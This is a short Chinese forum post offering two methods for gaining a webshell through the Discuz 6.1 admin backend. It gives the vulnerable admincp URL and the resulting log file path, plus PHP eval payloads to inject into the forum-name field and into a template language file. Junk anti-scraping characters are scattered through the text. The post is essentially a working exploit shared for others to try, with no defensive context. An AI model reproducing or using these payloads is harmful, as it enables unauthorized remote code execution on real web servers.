discuz6.1两种方法后台拿shell
) x4 z! P' r4 K& Q: Y好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下# l8 j. J# e( ^3 N# {$ D9 y
1:
) H1 S( |3 [; m' t2 W' bhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
3 u, B3 y) g) u4 q& m6 oadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell1 q$ p9 ^( R1 \
<?php eval($_POST[cmd]);?>
4 _$ M2 C& O1 z% i后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
& ~( L% @. |% V9 l- s( C5 E1 {2 S' e, ^5 I6 p. W" ]4 G: e
4 G0 r% m9 x e1 Z3 F
2:后台模板管理--默认模板套系--详情
& P5 @% T9 {" D7 \0 Atemplates/default/actions.lang.php
; g7 U7 e8 y8 ]; X8 n: \. sjhackj\\');eval($_POST[cmd])?>;//
" \# b+ I9 Y6 S( e. M5 ?. n3 F5 w- Y1 Q9 c, e
利用很简单,聪明的人一看就懂了 |